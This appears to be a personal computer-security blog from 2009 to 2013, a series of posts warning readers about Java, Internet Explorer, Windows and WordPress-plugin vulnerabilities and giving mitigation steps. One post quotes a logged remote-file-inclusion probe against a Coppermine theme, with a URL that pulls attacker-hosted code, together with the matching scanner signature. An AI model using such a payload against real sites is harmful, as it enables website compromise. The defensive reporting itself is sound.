Wiz's Computer and Website Security Blog

January 11, 2013

Once again, Oracle's Java software is in making security news for being exploited in most major exploit kits via a new zero-day vulnerability. A zero-day vulnerability is where a proof of concept exploit is disclosed before the software vendor has a chance to create a patch to block that attack vector. At this time, Oracle has not released a patched version of Java and there is no known workaround. The next regularly scheduled Java update is set for February 19, 2013.

UPDATE January 14, 2013

Oracle has just released an out-of-band sudden patch for the new vulnerability in its Java Virtual Machine. The patch is called Java 7 update 11, available here.

The most dangerous and exploited type of Java is the kind that is used as a "plug-in" for web browsers (Internet Explorer, Google Chrome, Firefox, Safari, Opera, etc.). You see, when you install Java on your computer or hand-held devices, it installs both as an executable package that can be used by desktop productivity and entertainment applications, and as a plug-in for each brand of web browser you have installed on that device. The browser plug-in is responsible for running Java Applets in your browser. These Applets are supposed to be contained within a programmed-in software boundary called a "sandbox" - but they are notorious for being exploited to jump out of the sandbox and into the operating system.

I should point out that Java has been one of the favorite targets of virus and malware exploit authors since the year 1998 (Strange Brew - first Java virus). Over the years Java has been deployed in more and more devices, to the point that Oracle, the current owner, claims that Java is installed on over 3 billion devices Worldwide. Chances seem reasonable that you are using one or more of those 3 billion devices.

Since Java itself can be installed and run on devices that are based on different operating systems, it can be used to download malware to any of those devices by simply detecting the operating system and downloading the appropriate binary program for exploiting it. The typical entry point for exploitation is a web browser. The method by which the browser is caused to run malicious codes can be clicking on obfuscated poisoned links in email scams, hidden "iframes" that draw the attack codes into otherwise legitimate websites (and your browser), or JavaScript redirects that were injected into the head or end sections of compromised web pages.

Java is exploited constantly, for both old and new versions and vulnerabilities, for at least three reasons: (1) It is found on 3 billion devices; (2) most people don't even know if they have Java installed on whatever devices they are using to connect to the Internet; (3) Oracle is very slow to patch Java vulnerabilities that they are notified about.

What you can do to protect your devices from Java exploits

Continue reading "Java is most exploited browser plug-in. Disable if not needed!" »

Posted by Wiz at 6:34 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

September 17, 2012
(Updated Sept 19, 2012, to include IE 6, plus tightening the security level of IE browsers)

The security channels are buzzing today with news about a brand new "zero-day" vulnerability in Internet Explorer browsers 6, 7, 8 and 9, which is actively being exploited to load the Poison Ivy Trojan onto victimized computers.

Details are still emerging about the exact method through which Internet Explorer is being exploited. However, one common factor is that the current exploit requires Adobe Flash to also be installed. The term "Heap Spray" is being used to describe the code injection action which leads to the downloading of a Shockwave Flash file by loading an invisible iframe into the browser. The Flash file it downloads then downloads and executes a file which installs the Poison Ivy Trojan.

NEW
A successful exploit of Windows Vista or Windows 7 also requires a vulnerable version of Java to be installed.

All of this happens behind the scenes and runs with the full privileges of the logged in user. This means that if you are lured to this trap and are operating with Administrator privileges and are browsing with Internet Explorer 6 through 9, your fully patched Windows PC may have the Poison Ivy, or some other Trojan silently installed right in front of you.

People who log in to less privileged account types will have to approve the malware installation and provide Admin credentials. While they might be tricked by crafty language, it is less likely that most of them will be fooled. FWIIW, I operate as a Power User (Win XP) and Standard User in Windows 7. Both are less privileged accounts.

Continue reading "New zero-day vulnerability in Internet Explorer being actively exploited" »

Posted by Wiz at 11:14 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

September 3, 2012

On August 29, 2012, I wrote an article about a new zero day exploit of the then latest versions of Java: version 7, updates 1 through 6. One day later, Oracle, the keepers of the mysteries of Java, released a patched version, Java SE 7u7 (update 7). It seems that their patch has still not closed the vulnerabilities exploited in the BlackHole Exploit Kit.

The security firm who first disclosed the new vulnerability used in the "zero day" attacks, did so on April 2, 2012, 5 months ago. During this time, Oracle failed to deliver any patch for that vulnerability. It was only at the very end of August 2012, when the technical details about the new vulnerability were made public and added to the BlackHole Exploit Kit, that Oracle rushed out a sudden patch, on August 30.

The firm who first reported the vulnerability tested the patched version and announced that it failed to block all off the exploit methods which they had already disclosed to Oracle, in April. If this is true, even if you apply the patched version, Java 7 build 7, your devices may be exploitable. So, I repeat my advice, which has been echoed by many others in the computer security field: if you don't really need Java, which is most Internet users, uninstall it! Very few websites are using Java Applets anymore. Most switched to Flash when it was in its heyday. Now, with Flash support dwindling in new devices and virtually all Mac and "i" products, many sites are switching to other emerging technologies, including HTML 5, to render active content.

OTOH, if you do require Java, to run office, intranet, or desktop applications, which don't need a web browser to display, upgrade to the latest version, set it to automatically check for updates every day, then disable the automatically installed Java plug-ins on all web browsers installed on your computer. This protects the web browsers from being exploited by a drive-by attack, or from somebody being fooled into clicking a poisoned link in an email, instant message, or Facebook posting.

See this US-CERT post for the simple details about these Java exploits.

Posted by Wiz at 10:54 AM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

August 29, 2012

Over the last few days I have learned about a brand new vulnerability in Oracle's Java virtual machine. This is an unpatched zero day exploit and it has just been added to the infamous BlackHole Exploit Kit. The next scheduled Java update is in mid-October! If you have Java installed, you're in danger right now.

The version of Java that is targeted by this new exploit is the latest: Java 7 (actually, 1.7, 1.7.0). Interestingly, there is another current version of Java in the old series 6: Java/JRE 6 Update 34 - which is not vulnerable to this particular attack vector! So, if you check your installed programs and plug-ins, and find the you do have Java 6 Update 34 and no other older or newer version or series, you can probably slide by for a little while (until the next patches are released in October).

But, if you do have Java 7 (1.7.1.7.0), you are vulnerable and need to take some preventative action. First of all, the exploit affects all browsers and all operating systems. It doesn't matter if you browse with Google Chrome on Linux; you can be exploited if you encounter a server targeting Linux computers in the exploit kit. Ditto for Macs. Windows users are the primary fish in the malware ocean and are always at risk.

What you can do now.

Two word answer: UNINSTALL JAVA

If you use a productivity program like Open Office, or a custom application which requires Java, but is not run inside a web browser, you can at least disable any Java "plug-ins" for all of your installed browsers. Every browser has a means of enabling, disabling, installing and uninstalling plug-ins. Search your browsers' options, or read the instructions on this page.

If you must keep Java enabled to run important programs, try to keep those computers off the Internet. If no can do, consider reducing their accounts to least privileged accounts (e.g. Limited User). I have published several blog articles and web pages about operating with reduced user privileges. Use my blog's search box, or see the popular posts section for this info.

Continue reading "New Java plug-in vulnerability being exploited. Disable Java Now!" »

Posted by Wiz at 2:04 AM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

July 19, 2012

For the last few weeks I have been reading security bulletins warning us to turn off the Windows Gadgets sidebar, which is a feature introduced on Windows Vista and continued on 7. Two security researchers, Mickey Shkatov and Toby Kohlenberg, have announced that the Gadgets Platform is basically exploitable and are going to present their evidence in a keynote presentation at the upcoming Black Hat Convention, on July 26, 2012, at Caesars Palace, Las Vegas, Nevada.

According to Black Hat USA 2012 briefings page, here is what these guys are going to reveal: "We will be talking about our research into creating malicious gadgets, misappropriating legitimate gadgets and the sorts of flaws we have found in published gadgets." Once their findings go public, hackers and cybercriminals will begin adding the published exploits to attack kits already in use (like the BlackHole, or Phoenix Exploit Kits). That is when it is going to hit the fan!

The Gadget sidebar is actually the Windows Gadget Platform. Misters Shkatov and Kohlenberg have notified Microsoft about their findings and in response, and without going into any meaningful details, Microsoft has issued a security advisory calling on concerned people everywhere to disable their (Windows Vista and Windows 7) Gadgets and Sidebars!

Here is the warning on the Microsoft Security Advisory (2719662) page:

An attacker who successfully exploited a Gadget vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

The following paragraphs show two methods of disabling, or re-enabling your Windows Gadgets and Sidebar.

Continue reading "How to disable or re-enable the Windows 7 Gadgets sidebar" »

Posted by Wiz at 1:32 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

July 2, 2012

On June 12, 2012 (Patch Tuesday), Microsoft published Security Advisory 2719615 that revealed an exploitable vulnerability in their XML Core Services, which are used by various Windows programs. Less than three weeks have passed since that Advisory and cyber-criminals have already added this vulnerability to the latest update of the BlackHole Exploit Kit.

Here is an excerpt form the Microsoft Techcenter article defining this vulnerability:

Microsoft is aware of active attacks that leverage a vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0. The vulnerability could allow remote code execution if a user views a specially crafted webpage using Internet Explorer.

The Advisory goes on to note the following details:

1. An attacker would have to trick users into visiting the BlackHole equipped website in order to run the exploit attack.
2. This is usually done by social engineering tactics used to trick victims into clicking on a hostile link, in an email message, or Instant Messenger, or Facebook or Twitter message, that redirects them to the attack code website.
3. The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007.
4. The MSXML vulnerability inherits the privileges of the logged-in user. Less privileged accounts would be less likely to be infected, without further user interaction (like agreeing to a UAC challenge and allowing unknown, unexpected code to run with Administrator Privileges! DOH!)

Continue reading "Unpatched Microsoft XLM vulnerability now in BlackHole Exploit Kit" »

Posted by Wiz at 2:07 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

I have detected a huge exploit probe attack against the Maze theme interface for Coppermine web photo galleries, targeting my blog. Hundreds of probes were launched tonight, August 21 through 22, 2011, from the IP address 64.31.60.72 - a static IP which belongs to Limestone Networks, in Dallas, Texas.

Here is a tiny excerpt of the attack, meant to exploit a vulnerability in the Coppermine-Maze Theme, to include hostile files and codes into a blog, or photo gallery, via a vulnerable and unpatched Coppermine theme:

64.31.60.72 - - [21/Aug/2011:14:55:18 -0600] "GET /blogs/2009/11//modules/coppermine/themes/maze/theme.php?THEME_DIR=http://184.22.121.212:60000/byroe.jpg?? HTTP/1.1" 405 766 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

You will note that the URL where the exploit code is hosted is shown to be http://184.22.121.212 - which resolves to 184-22-121-212.static.hostnoc.net. The exploit is defined in the RFI (Remote File Inclusion) Vulnerabilities Scanner, at the OSSEC Wiki, as: "$rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";" That exploit code has been in the wild since April 2004, according to Security Tracker.

If you are running the Coppermine Photo Gallery software on a website under your control, check your access logs to see if you have been hit by this attack. Then, look at the server response codes and see if any are code 200. If so, you are probably hacked. I feed them a Server 405: Method Not Allowed.Next, log into your Coppermine admin panel and go over every setting to see what, if anything has been changed without your knowledge. Visit your gallery, using Firefox, with the NoScript add-on installed and active. View the Source code of your Gallery web pages and press Control + A to highlight all text and codes. Look for 1x1 px iframes with links to outside websites and other bad codes, like JavaScript or meta refresh redirects.

Remove any hostile changes, then save the cleaned pages. Check your server permissions to make sure that they are not writable by the World; just the Owner (You). 644 is safest (Read-Write for Owner - Read-Read for Group and World) permission, for html, script, and php files. Seek updates for Coppermine and for any themes you are using with it. Notify your web host of the exploit and have them run a vulnerability scan on your remaining pages and clean up anything you overlooked.

If you use an FTP client to upload files to your website, you can establish permissions on each remote file. Check the Help file that is part of the FTP program. If you use WS_FTP, on a Linux/Unix host, there is a right-click option labeled Properties, which opens a box that sets the numeric or actions permissions for any selected file, or group of selected files. Clicking OK after changing permissions makes the change take. If you see PHP or HTML files with 664, or 666 permissions, change them to 644, unless you know that they are safe to be left writable by the World (aka: Everyone) and Group.

If you use a web interface to manage files on your server, check the instructions for how to set or change file permissions on the server.

According to the Coppermine home page news, the latest stable version containing security patches is cpg1.5.12 (Security release - upgrade mandatory!), dated 02 January 2011. There is a very recent maintenance release: cpg1.5.14, dated August 1, 2011. I advise you to upgrade to the latest version on the Coppermine home page, if you have any older version number. Get on their mailing list to be notified about security updates, as they are issued.

Stay safe and keep your website safe for your visitors. As a Webmaster you must practice safe Hex! Do not assume that you web host will update software you have chosen to install. They won't do anything except shut down your account when it gets reported for infecting innocent visitors. If you don't know how to update web software, call your web host, ask for technical support and request assistance updating your galleries, blogs, themes, etc. They may charge you a fee, or not. You install it, you update it! It gets hacked, you fix it!

Posted by Wiz at 12:38 AM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

If you a website owner, or Webmaster and you have installed WordPress blog software with image gallery themes on your websites, you may have a big problem, effective 8/1/2011. These programs are complicated software and as such, are subject to flaws caused by programming oversights. Exploitable scripting flaws have been discovered in a popular plug-in for themes: TimThumb. Those flaws are currently being used to inject malicious scripts and codes into millions of web pages. You need to see if your website is vulnerable to these exploits in the wild.

The details

This particular problem doesn't lie inside the WordPress software itself, but in a third party "plug-in" used by image themes that allow resizing of uploaded images. Those images may be uploaded by the owner of the blog, or by visitors from the Internet. Therein lies the danger.

First of all, you must be running the most current version of WordPress, which at this writing is v 3.2.1, preferably, with only themes approved and delivered through the WordPress website. This will protect the WordPress software itself, until a new vulnerability is discovered and published by hacker groups. Always get on the WordPress mailing list so you are notified when new versions are released. I recommend you bookmark and read this page often: http://wordpress.org/news/category/security/

You still need to check any theme directories (aka Folders) for the presence of the currently exploited file. If you are using an older version of WordPress, you had better upgrade first, at http://wordpress.org/.

The file currently being exploited by remote scanning scripts is named TimThumb.php. This file is used to resize images that are allowed to be uploaded to photo galleries. TimThumb is "inherently insecure" because it writes files into a temporary cache directory when it fetches an image and resizes it. But that directory, which is a sub-directory of your main WordPress directory, is accessible to people visiting the website. An attacker can compromise the site by figuring out how to get TimThumb to grab a malicious PHP file and put it in the WordPress directory. The code will be executed if an attacker then accesses the file using a Web browser.

Continue reading "Website using WordPress image resizing themes need to take action Now" »

Posted by Wiz at 11:24 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

Most computer users are aware that particular file extensions will open in the program associated with that file type, which typically has the format of a prefix (file name), a period, then a suffix or extension. Double click on a .doc file and it will open in either Microsoft Word, or Oracle's OpenOffice, if either is installed and associated as the default program for the .doc file type. Double click on a .jpg file and the the graphics program associated with .jpg files will launch and display that image.

The majority of computer users are using computers that operate on various Microsoft operating systems. All operating systems published by Microsoft recognize .exe and .scr (screensaver) files as executables and will launch the program compiled inside those files, when they are double clicked. That .exe program may be a self-contained, stand-alone application, or the file might be a "setup" container for a program that needs to be "installed" into your computer before it can run.

It is a fact, that Microsoft operating systems are shipped out with a default folder view setting that hides the extensions of known file types; including .exe and .scr file types. If you haven't changed your Windows computer's default folder view settings, when you download a setup or installer file, all you see is the prefix, or file name, without the .exe extension. Thus, "Setup.exe" will usually appear on your PC as just "Setup". Similarly, a downloaded screensaver will appear without the .scr extension.

Windows is designed to extract information buried within most files, to display an "icon" that represents the type of file it claims to be. This allows Windows users, with default view settings that turn off file extensions, to get an idea about what type of file they are looking at, before they open it. So, an exe file might have an icon an open floppy disk box in front of a stacked PC and monitor, or an icon representing the program or its brand. That is what you might normally see for an executable file, unless the writers have embedded a custom display icon.

If a setup program has a manufacturer's custom icon, it is there because the writers inserted that icon into the program when it was "compiled." The people compiling that program can cause it to display any icon they choose to embed, including those representing a graphics image, or common text document, or a brand logo, or program name or initials. There is nothing stopping a malware distributor from having his installer compiled so it displays a .jpg image icon.

Now that you have these basic facts in mind, I am going to educate you (Windows users) about how these facts can be used against you, to trick you into manually installing malware.

Continue reading "Reverse direction file names & hidden extensions hide malware installers" »

Posted by Wiz at 1:30 AM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

On January 28, 2011, Microsoft released a security advisory acknowledging a publicly-disclosed vulnerability in all versions of Windows. Security Advisory 2501696 describes a bug in the MHTML handler in Windows which could lead to information disclosure, or worse.

Begin Techno-babble:

Proof Of Concept code has already been published and soon this vulnerability will be added to all of the most popular exploit attack kits. The vulnerability exists in all supported (and unsupported - end of life) versions of Windows, in an Internet protocol known as MHTML. Windows includes a web document protocol handler (MHTML:) that allows various applications to render MHTML structures. Internet Explorer is one of these and it can be abused to exploit the bug in the context of a web page, causing a hostile script to be executed.

The vulnerability exists due to the way MHTML interprets MIME-formatted requests for content blocks within a document. It is possible for this vulnerability to allow an attacker to run script in the wrong security context. An attacker who successfully exploited this vulnerability could inject a "client-side" script (that's your side) in the user's Internet Explorer browser, or background process. The script could spoof content, disclose information, or take any action that the user could take on the affected Web site on behalf of the targeted user.

What is MHTML?
MHTML (MIME Encapsulation of Aggregate HTML) is an Internet standard that defines the MIME structure that is used to wrap HTML content. The MHTML protocol handler in Windows provides a "pluggable" protocol (MHTML:) that permits MHTML encoded documents to be rendered in applications capable of recognizing MHTML content.

End Techno-babble

What you can do to protect your PC from this script injection vulnerability

First of all, limit your target-ability by using Mozilla Firefox or Google Chrome as your default web browser, instead of Microsoft's Internet Explorer. The MHTML scripts that are used in this exploit trigger certain events that are specific to Internet Explorer. However, even if you use a different brand of browser, if you are lured or redirected by a link to a hostile website, you can take it to the bank that other exploits will be launched against your browser. Still, you won't have the code injected into your Firefox or Chrome browser, as you would if you encounter this exploit using Internet Exploder!

The second thing all Windows users can do is to disable the MHTML handler that is responsible for this new vulnerability. A Fix-It Tool has been released by Microsoft, which can disable the affected protocol until Microsoft releases an official patch. There is also an Undo Tool on the same page. These Tools are just Windows Registry entries that turn off the MHTML Handler security zones for Internet Explorer and its children (MS Outlook, Outlook Express, Windows Mail, Windows Live mail). This also disables (rare) MHTML content in Windows Media Player

Note: since the MHTML vulnerability exists in other Windows applications besides Internet Explorer, you are strongly advised to disable that protocol, using the Fix-It Tool. Since this tool is based upon the Microsoft .msi extension, you must run it either from an Administrator level account (Win XP, Windows Server 2003 or older), or by elevating your privileges to Run As Administrator in Windows Server 2008, Vista and 7. By default, Internet Explorer on Windows Server 2003, Windows Server 2008, and Windows Server 2008 R2 runs in a restricted mode that is known as Enhanced Security Configuration. This mode mitigates this vulnerability.

See the Registry hack in my extended content to include the "Run As" command for .MSI files under Windows XP, Server 2003 and 2008, Windows Vista and Windows 7

Continue reading "Microsoft MHTML Critical Windows Vulnerability & Fix-it Tool" »

Posted by Wiz at 2:03 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

The last two weeks of December 2010 saw fewer vulnerability reports than some previous weeks in the last quarter of the year. This doesn't mean that criminals are sitting still, just that they are laying low to try to avoid attracting the attention of local authorities. Lately, Police in such far away places as The Ukraine and Russia have been arresting cyber criminals for unlawful online activities. Many of those arrested thought they were safe in the former USSR, but they were mistaken.

Here is a rundown of the security alerts issued and patched software released by the vendors of exploitable software, from December 14, through 31, 2010.

Son Of Storm Worm
Shadowserver Foundation has uncovered a new spam campaign that they think is the work of a new botnet based on a new generation of the Storm or Waledac Bot executables. One of the main characteristics of this new botnet is its large scale e-card spam campaigns, sending out scam e-mails with links to exploit pages hosted on a Fast-Flux network of botnetted PCs. It also shares some code used in the original Storm Worm and Waledec Bot. ShadowServer is temporarily referring to this new Botnet as Storm 3.0 or Waledac 2.0.

The original Storm Worm Botnet was most active in 2007. Millions of spam messages were sent by zombie computers, all containing links to fellow zombies, with numeric IP URLs in the spam emails. Most featured a fake e-card, or love message, or fake news about a storm than swept across parts of Europe in early 2007. The destination pages had a fake, non-functional video, with an Adobe Flash player that "needed to be updated" with their version. That player was the Storm Worm, which made those computers members of the then largest Botnet on Earth, at the time.

Storm declined in late 2007, but made a big resurgence in the summer of 2008. Because of the sheer number of Windows PCs infected with the Storm Worm, it attracted the attention of the code writers working on the Microsoft Malicious Software Removal Tool. The September 2008 Windows Updates featured code routines that detected both variants of the Storm Worm and completely eradicated it from hundreds of thousands of computers on Patch Tuesday, September 18, 2008. Days later, authorities forced rogue ISP Atrivo off the Internet, severing 3 of the 4 Command and Control servers used by the Russian or Ukranian gang running the Storm Botnet.

I have already warned my readers of my weekly spam analysis to be on the lookout for fake e-card greetings this Winter. They have links to compromised websites, with instant refreshes to fake Flash Player updates and other exploits, hosted on compromised personal computers. The IP addresses change with every connection request (Fast-Flux Domains); rotating the payload among the thousands of zombie PCs in the new Botnet.

Each of these Fast-Flux domains also appears to be hosted on a single Ukrainian IP address at 91.204.48.50. I would recommend blocking access to this IP address. It is already included in my published Russian Blocklist, but you can add it to your Windows computer by opening your HOSTS file and adding this line of code, then saving the file again as HOSTS (no extension):

127.0.0.1 91.204.48.50
_____________________

Wordpress Critical Update
Next up, there was a critical flaw discovered in the base code of the Wordpress PHP files. Therefore, Wordpress.org has released a patched version: 3.0.4 of WordPress, available immediately through the update page in your Wordpress dashboard, or for download here. It is a very important update to apply to your sites as soon as possible because it fixes a core security bug in our HTML sanitation library, called KSES. I would rate this release as "critical."

Note: if your websites, like mine, are hosted on Bluehost, or certain other hosting companies associated with Bluehost, you can use the custom script installers found in the Simple Scripts section of your cPanel control panel. These commonly deployed scripts are kept up to date with security patches and are easy to install with a few mouse clicks. Wordpress is included as it is so commonly probed and exploited. Any out-dated version of Wordpress will be owned by hackers and used to infiltrate your website with hostile redirection scripts, spam comments, or phishing pages.

Zero Day IE Exploit
There is a new zero day exploit for Internet Explorer browsers in the wild. Imagine that! See this page on PCMag for the details.

Microsoft WMI Administrative Tool ActiveX Control Vulnerability
US-CERT is aware of a vulnerability affecting the WBEMSingleView.ocx ActiveX control. This control is part of the Microsoft WMI Administrative Tools package. Exploitation of this vulnerability may allow an attacker to execute arbitrary code.

US-CERT encourages users and administrators to set the kill bit for CLSID 2745E5F5-D234-11D0-847A00C04FD7BB08 to help mitigate the risks until a fix is available from the vendor. Information on how to set a kill bit can be found in Microsoft knowledge-base article KB240797. Users and administrators are also encouraged to implement best security practices defined in the Securing Your Web Browser document to reduce the risk of this and similar vulnerabilities.

That's all I have for you tonight. I'll post more security updates news next week, or sooner if necessary.

Posted by Wiz at 3:47 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

During the middle of August, 2010, public details began to emerge about a long-standing vulnerability afflicting dozens of popular programs and how they load dynamic link library files (.dll). Soon after the details were published, hacker sites began posting exploit codes. Now, cybercriminals are using these vulnerabilities in multi-exploit kits, in attacks against your applications, browsers and their plug-ins.

On August 23, 2010, Microsoft published an advisory about the DLL vulnerability, then updated it on Aug 31. In that advisory one can read about recommended workarounds and mitigating factors. There is a link on that page to a MS Fix-It tool page, titled: "A new CWDIllegalInDllSearch registry entry is available to control the DLL search path algorithm" - which requires one to first apply a Registry fix shown on that page. Be forewarned, this is a lot of highly technical stuff. I recommend that anybody capable of reading through the Microsoft advisory and workaround pages apply the fixes as soon as possible. The rest will have to wait until a suitable patch is available via Windows Updates.

At the time I posted this article, the security firm Secunia has identified 176 programs and operating systems that can be exploited by directing one of these applications to load a remotely hosted hostile file, when the targeted program opens, or opens an associated file. The exploited files are .dll libraries, which just about every Windows program uses as includes to add functionality to the main program executable. The .dll files are actually executable files, but only when called by another executable. They are technically referred to as Portable Executable, or PE files.

Of these 176 programs, Microsoft is responsible for 20, including numerous operating systems, like Windows XP, Vista and 7, its MS Office applications, and the Windows Live Mail email client. ALl remain unpatched as of October 11, 2010. Watch for some possible fixes on Patch Tuesday, October 12, 2010. Hopefully, some, is not all of the vulnerable Microsoft programs will be patched. It has almost been two months since the public disclosure. C'mon, Microsoft!

Seven popular Nero and Roxio CD burning programs are affected, as are media players WinAmp and RealPlayer. BlackBerry Desktop Software version 3 through 5 are vulnerable. Even QuickBooks 2010 made the vulnerable list!

You can look over the complete list of vulnerable programs, and see which ones have had patched versions released. If you see apps that you are using on this list, and they are unpatched, your best protection is to reduce your user privileges. If you use Windows XP, a Limited User account is the safest. For Windows XP Professional, Vista and 7, a Standard (XP Power User), or Limited account is safer than an Administrator account. Operating with reduced user privileges also reduces any danger of exploitation, or lessens the impact of exploitation to just that account, rather than the entire operating system.

If you are browsing the Internet with Internet Explorer, try switching to Mozilla Firefox instead. Firefox has already been patched against the .dll loading vulnerability.

Posted by Wiz at 3:27 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

According to a security bulletin posted on Adobe.com, on April 13, 2010 they will be releasing updated version 9.3.2 of Adobe's PDF Reader and Acrobat PDF encoder software, for Windows, Mac and Linux/Unix operating systems. This is a critical update that will correct a feature that has been demonstrated to be an attack vector that can be used by criminal exploiters. There is also going to be an update from version 8.2.1 to v 8.2.2 for Windows and Macintosh platforms using that version.

If you have installed Adobe Acrobat or Reader 9.3.1 and chosen to set the preferences to automatically check for and apply updates, you should receive the new version when it is released in your timezone, on April 13, 2010. If you haven't set that preference, you can do so now, by following these steps...

Open Adobe Reader 9.x. Click on Edit. Scroll down to the bottom of the flyout options and click on "Preferences." When the Preferences box opens go to the last entry on the left, labeled "Updater" and click on it. In the left options select "Automatically install updates." Click OK to save your changes.

If you cannot allow the automatic updater to be enabled, due to company policy or paranoia, you should check for updates manually, by opening Reader or Acrobat, then go to the "Help" menu item, then click on the flyout option "Check for Updates." You must have Administrator privileges to check for updates, or to alter the automatic updater preferences.

The feature that is being patched on April 13 is a command known as "/Launch /Action" - which has been a part of Adobe' Reader and Acrobat for a long long time. Adobe's Reader and Acrobat are able to open or launch embedded and external applications by using this function, but they first display a dialog box requesting the user's permission. The wording inside the dialog box can be set by the author of the PDF file in question. This would allow a criminal or hacker to craft words designed to fool users into thinking that they were doing the right thing by opening an application or executable that may be embedded within the PDF package. This could be accomplished by social engineering tactics, such as are already used successfully in various Phishing attacks. They could make a PDF document look like a message from your bank or loan company, with authentic logos, then present the Open dialog box with wording to the effect that you must click Open to submit the enclosed form. You could be fooled into installing a keylogger, or Bot malware on your PC, just like that.

As was demonstrated by researcher Didier Stevens, on March 29, 2010, if a user receives such a specially crafted PDF file and is tricked into allowing the Launch action to take place, their computer could become infected with an embedded virus, or malware downloader, or the default browser could be opened to a URL where malware attacks could be launched. Furthermore, another proof of concept exploit has been demonstrated showing the this attack could be used to infect other clean PDF files on that computer, turning the original malware laden PDF file into a replicating Worm.

If you don't want to wait for Adobe's patch to be released on April 13, you can manually disable the feature that allows the exploit to occur. Just open the Adobe Reader or Acrobat Preferences (under Edit), find the left sidebar option labeled "Trust Manager" and click on it. When the Trust Manager options load, uncheck the top option labeled: "Allow opening of non-PDF file attachments with external applications." Click OK and you are protected from this particular exploit vector.

While the Reader/Acrobat Preferences are still open, consider disabling JavaScript (under "JavaScript") and/or displaying of PDF documents in Web browsers (under "Internet"). That fixes two other attack vectors already in use by malware authors. If you find that you need JavaScript to fill in forms or read certain documents, just re-enable it as needed.

You can really reduce your computer's likelihood of becoming infected by operating with non-Administrator rights. If you use Windows XP Home you can demote your account to Limited User, while XP Professional users can become Power Users. Vista and Windows 7 has a new account type called Standard User and that is what you should use for your every day operation. You should read my recent post explaining how 90% of critical Windows vulnerabilities can be mitigated by removing Admin rights from an account.

Posted by Wiz at 1:11 AM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

According to a recent study, as much as 90% of all Windows 7 vulnerabilities can be mitigated by forcing users to operate their computers with Standard User privileges, rather than Administrator privileges. This is something I have been harping about for several years. The following are some of their findings after an extensive study.

From a news release published by BeyondTrust, on March 29, 2010, BeyondTrust's Analysis of 15 months of Microsoft Security Bulletins finds the vast majority of vulnerabilities can be diminished by configuring end users as Standard Users. They found that the removal of administrator rights from Windows users is a mitigating factor for 90% of Critical Windows 7 Vulnerabilities.

Key findings from this report show that removing administrator rights will better protect companies against the exploitation of:

• 90% of critical Windows 7 vulnerabilities reported to date


• 100% of Microsoft Office vulnerabilities reported in 2009


• 94% of Internet Explorer and 100% of Internet Explorer 8 vulnerabilities reported in 2009


• 64% of all Microsoft vulnerabilities reported in 2009

"Enterprises continue to face imminent danger from zero-day attacks as new vulnerabilities are exploited before patches can ever be developed and deployed," said Steve Kelley, EVP of corporate development. "Our findings reflect the critical role that restricting administrator rights, plays in protecting against these types of threats. As companies migrate to Windows 7 they need to be aware that despite enhanced security features on the new operating systems, better controls for administrative rights are still needed to provide adequate protection."

My note: The same results can be had with the Windows 2000, XP Pro and Vista operating systems. See my 2009 article titled Running a PC with reduced user privileges stops 92% of malware

For information about how to manage user account privileges, please read my web page titled Windows 2000, XP, Vista & 7 User Account Privileges Explained. Although it was originally written when Windows 2000 and XP were the mainstream OSes, updated information for Windows Vista and Windows 7 computers has been added. Besides, some of you are probably reading this on an XP computer and this information can protect that PC from malware attacks that would otherwise be successful.

That said, no Windows computer is truly safe without some form of anti-virus, anti-spyware and anti-malware protection installed and kept up to date. If you are looking for an all in one solution for complete malware protection please look into Trend Micro Internet Security. A single license allows you to install it on three computers for as long as the subscription is paid up. They offer reduced rates for additional years of coverage when you sign up. I can get you a 10% discount on your initial subscription to Trend Micro Internet Security right now. Just copy and paste my coupon code "trendsecurity" into the coupon field in the shopping cart and apply it and the total will be reduced by 10%.

Posted by Wiz at 3:14 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

December 16, 2009

